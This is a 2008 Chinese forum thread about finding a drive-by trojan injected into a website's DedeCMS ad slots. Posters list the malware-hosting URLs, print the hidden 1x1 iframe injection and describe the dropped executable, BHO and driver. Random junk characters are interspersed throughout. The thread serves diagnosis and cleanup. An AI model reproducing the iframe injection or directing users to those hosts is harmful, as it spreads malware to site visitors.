webmasterz.cn上的掛馬掛在哪了 我怎麼查了半天查不到？

請老大仔細的查查吧，剛又發現了幾個，全是免殺的~~一個勁的往外蹦，但是我的卡卡即不報~~
http://ppp.749571.com/dm/test.htm
http://www.985676.cn/encrypt/mm.htm
+ o) R7 x+ b  ^$ c7 X  x$ V這兩個是免殺的，還有幾個沒記下來，
6 V; ]' S+ P3 X7 v* k+ a, O- D這掛馬的兔崽子有一手，隱藏的很好啊~~一般人都看不出來~

會在C盤下產生 CRESS1.EXE
然後增加IE的BHO的木馬 還釋放驅動

昏 他藏得好隱秘  找到了 放毒得地方了
6 {5 c1 Z; F1 w* ?+ n1 o3 U$ O
8 r. F; C. R7 F% uiframe src=h t t p://w w w.9856 76.cn/encrypt/mm.htm width=1 height=1></iframe>
然後再這個地址轉到ppp.749571.co m/dm/test.htm
* q  ~  M6 }5 {+ k( j0 o: {5 {+ o! D  k為了跟蹤這個病毒 自己失誤的。。。。哎。修復中ing。。。。
靜水趕快清理了吧

原帖由 20082008 於 2008-1-9 16:33 發表
) }* j4 a9 f4 l8 b/ b) O( C沒裝REAL就沒事，好在我重新裝的系統:

說的沒錯

原帖由 freelzyr 於 2008-1-10 16:47 發表
進dede後台
檢查 ad_js.php?aid=1  
1 S- J8 k# `0 @9 S9 Z3 v3 Iad_js.php?aid=2
. r/ D- [6 Q! O" o, ~ad_js.php?aid=3
6 |* l) g0 T# _3 Fad_js.php?aid=4
7 T8 R' i& X3 l
這幾個廣告 裡面的代碼
/ M; Y( {% ^, k& I- ~8 M/ [) j3 ?, E在這幾個 掉茅廁位 裡面   含有 木馬的 代碼

1 ~3 x' L8 Q6 x2 R# ^, j6 O這個檢查了沒有的

原帖由 靜水流深 於 2008-1-11 02:27 發表

6 y; L* t# a0 i. t' p6 m# a) X
這個檢查了沒有的

2 K! Y  f6 ~2 B3 Z& ~( q) k
) @+ L' b1 K; d) g: @& j
& E" B1 c( b0 O6 y/ C" w" `我看過了，有掛馬的代碼，代碼已經在你的另一個貼子裡貼出來了

原帖由 靜水流深 於 2008-1-11 02:27 發表

& c" m5 ?5 _4 Q2 n; Q' z' S
這個檢查了沒有的

( \1 ~% K7 A% _. G* `木馬就是在這裡裡啊
9 Q3 H" v+ [) v4 Y在後台的掉茅廁位設置那
6 G: K& p/ y$ L0 ]2 E裡

現在明瞭.
有人收流量做ppp.749571.co m的..
最近被掛馬的話. 都改成js了. 不用iframe了

菜鳥,怕怕,不敢看,啥時好了說一聲,我再去看風景